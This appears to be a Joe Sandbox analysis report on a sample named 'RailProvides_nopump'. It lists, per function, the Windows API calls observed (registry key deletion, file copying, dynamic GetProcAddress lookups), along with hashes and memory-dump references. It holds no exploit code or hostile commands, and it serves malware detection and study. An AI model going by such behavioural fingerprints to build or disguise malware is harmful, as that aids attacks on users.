                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: *?|<>/":
                                                                    • API String ID: 589700163-165019052
                                                                    • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                    • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                    • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                    • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Close$DeleteEnumOpen
                                                                    • String ID:
                                                                    • API String ID: 1912718029-0
                                                                    • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                    • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                    • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                    • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                    APIs
                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                    • String ID:
                                                                    • API String ID: 1849352358-0
                                                                    • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                    • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                    • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                    • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                    • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                    • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                    • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                    APIs
                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                    • API String ID: 1697273262-1764544995
                                                                    • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                    • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                                    • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                                    • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                                    APIs
                                                                    • IsWindowVisible.USER32(?), ref: 00404902
                                                                    • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                    • String ID: $@rD
                                                                    • API String ID: 3748168415-881980237
                                                                    • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                    • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                                    • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                                    • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                                    APIs
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                      • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                      • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                    • API String ID: 2577523808-3778932970
                                                                    • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                    • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                    • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                    • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcatwsprintf
                                                                    • String ID: %02x%c$...
                                                                    • API String ID: 3065427908-1057055748
                                                                    • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                    • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                    • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                    • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 00405057
                                                                      • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                    • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                    • String ID: Section: "%s"$Skipping section: "%s"
                                                                    • API String ID: 2266616436-4211696005
                                                                    • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                    • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                    • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                    • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00402100
                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                    • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                    • String ID:
                                                                    • API String ID: 1599320355-0
                                                                    • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                    • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                    • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                    • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                    APIs
                                                                      • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                    • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                    • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                    • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcpyn$CreateFilelstrcmp
                                                                    • String ID: Version
                                                                    • API String ID: 512980652-315105994
                                                                    • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                    • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                    • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                    • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                    APIs
                                                                    • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                    • GetTickCount.KERNEL32 ref: 00403303
                                                                    • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                    • String ID:
                                                                    • API String ID: 2102729457-0
                                                                    • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                    • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                    • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                    • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2043551602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.2043493177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043579274.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043595725.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2043796056.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RailProvides_nopump.jbxd
                                                                    Similarity
                                                                    • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                    • String ID:
